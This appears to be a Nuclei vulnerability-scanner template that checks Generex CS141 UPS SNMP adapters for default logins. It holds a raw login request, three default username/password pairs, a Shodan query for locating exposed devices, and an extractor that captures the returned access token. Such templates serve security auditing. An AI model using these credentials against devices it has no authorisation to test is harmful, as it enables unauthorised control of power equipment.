id: cs141-default-login

info:
  name: UPS Adapter CS141 SNMP Module Default Login
  author: socketz
  severity: medium
  description: UPS Adapter CS141 SNMP Module default login credentials were discovered.
  reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
  tags: hiawatha,iot,default-login
  metadata:
    shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
  classification:
    cwe-id: CWE-798

requests:
  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json

        {"userName":"{{user}}","password":"{{pass}}"}

    attack: pitchfork
    payloads:
      user:
        - admin
        - engineer
        - guest
      pass:
        - cs141-snmp
        - engineer
        - guest

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'accessToken'
          - 'application/json'
        condition: and
        part: header

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - accessToken

# Enhanced by mp on 2022/03/07